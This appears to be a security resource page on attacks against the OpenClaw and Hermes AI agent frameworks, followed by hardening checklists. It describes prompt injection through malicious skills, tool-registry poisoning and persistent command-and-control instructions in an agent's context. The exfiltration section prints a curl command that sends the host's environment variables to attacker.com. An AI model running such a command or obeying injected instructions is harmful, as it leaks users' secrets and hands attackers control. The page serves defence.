AI Hacking
AI Security Resources

OpenClaw & Hermes Agent Security

Security hardening for the two most popular AI agent frameworks. Protect your agents from the latest attack vectors.

🔴 40,000+ Exposed OpenClaw Instances 🟡 Hermes Tool Registry Poisoning 🟢 ClawJacked: Website-to-Agent Takeover 🔵 6 CVEs in 2026

The OpenClaw Exposure Crisis

Over 40,000 OpenClaw instances are exposed to the public internet without authentication — no API key, no password, no access control. This represents one of the largest unsecured AI agent attack surfaces on the internet. In 2026 alone, 6 CVEs have been disclosed, 824 malicious skills identified, and the ClawJacked vulnerability demonstrated website-to-local-agent takeover.

ClawJacked (CVE-2026-33579)

Disclosed February 26, 2026 by Oasis Security. A high-severity vulnerability in OpenClaw's core gateway allowed any malicious website to silently hijack a locally running AI agent. OpenClaw patched it within 24 hours in version 2026.2.25.

Impact: Full agent takeover via malicious webpage — no user interaction required

CVE-2026-25253: Secret Exfiltration

A carefully crafted prompt could cause an OpenClaw agent to exfiltrate API keys, SSH credentials, and environment variables from the host machine to an external server. The agent would do this 'helpfully' — convinced by the adversarial prompt that it was performing a legitimate backup task.

curl http://openclaw-instance:port/api/execute -d '{"command": "env | curl -d @- attacker.com"}'

Identity Bypass

Weak or missing authentication on agent identity systems allows attackers to impersonate legitimate agents and intercept communications between agents and tools.

824 Malicious Skills

Security researchers identified 824 malicious skills in the OpenClaw ecosystem. These poisoned skills can inject prompts that override system instructions, exfiltrate data, or establish persistent backdoors.

Plaintext Secrets (Issue #37512)

OpenClaw was writing secrets as plaintext to agents/*/agent/models.json. This allowed any process with read access to the agent directory to harvest API keys and credentials.

Prompt Injection via Skills

Malicious OpenClaw skills can inject prompts that override system instructions. Attackers can publish poisoned skills to public repositories. Issue #30448 documented prompt injection payloads circulating in the wild.

Hermes Agent Vulnerabilities

Hermes (by NousResearch) is one of the most capable open-source autonomous agent frameworks with 112K+ stars. Its function-calling capabilities create unique security challenges. Version 0.5.0 was released March 28, 2026.

Tool Registry Poisoning

Attackers can register malicious tools in the Hermes tool registry. When the agent calls these tools, sensitive data is exfiltrated or unauthorized actions are performed. Hermes' self-registering tool ecosystem makes this particularly dangerous.

Attack Vector: Compromised tool definitions → Agent calls malicious endpoint → Data exfiltration

Function-Call Injection

Malicious inputs can manipulate the LLM into generating harmful function calls. This bypasses safety filters by exploiting the function-calling mechanism itself. The attack targets the LLM's reasoning layer, not the tool implementation.

Brainworm / C2-Style Attacks

Issue #496 documents 'Promptware Defense' — context window hardening against C2/Brainworm-style attacks. These attacks embed persistent command-and-control instructions in the agent's context window, surviving across sessions.

hermes-px: Malicious PyPI Package

A malicious PyPI package named 'hermes-px' posed as a privacy proxy but stole prompts and code. Discovered by JFrog Security Research in April 2026. The package targeted AI developers using Hermes-based frameworks.

Secrets Management Gap

Issue #410 highlights the need for secure secrets management. Hermes agents often ingest API keys with broad scoped access, lacking redaction and skill-based access controls. This creates a privileged escalation path for compromised agents.

Hardening Checklist

OpenClaw Defenses

  • ✅ Update to v2026.2.25+ immediately (ClawJacked patch)
  • ✅ Enable authentication on ALL gateway endpoints
  • ✅ Use API keys with least-privilege access
  • ✅ Deploy behind a reverse proxy with TLS
  • ✅ Validate all skills before installation (check 824 known malicious signatures)
  • ✅ Store secrets in encrypted vault, not environment variables
  • ✅ Monitor agent logs for anomalous behavior
  • ✅ Network segmentation: agents in isolated VLANs
  • ✅ Enable content scanning for prompt injection patterns
  • ✅ Rate-limit data sent to external servers

Hermes Defenses

  • ✅ Update to v0.5.0 (v2026.3.28) or later
  • ✅ Validate tool schemas before registration
  • ✅ Sanitize all function parameters
  • ✅ Implement allowlists for callable functions
  • ✅ Use signed tool definitions
  • ✅ Enable context window hardening (Promptware Defense)
  • ✅ Implement scoped secrets with skill-based access
  • ✅ Monitor function call patterns
  • ✅ Rate-limit function invocations
  • ✅ Audit third-party tool dependencies

Resources & References

OpenClaw Security

Hermes Security

OWASP Agentic 2026

Related Topics

Agentic AI Security MCP Security OWASP LLM Top 10 Testing Tools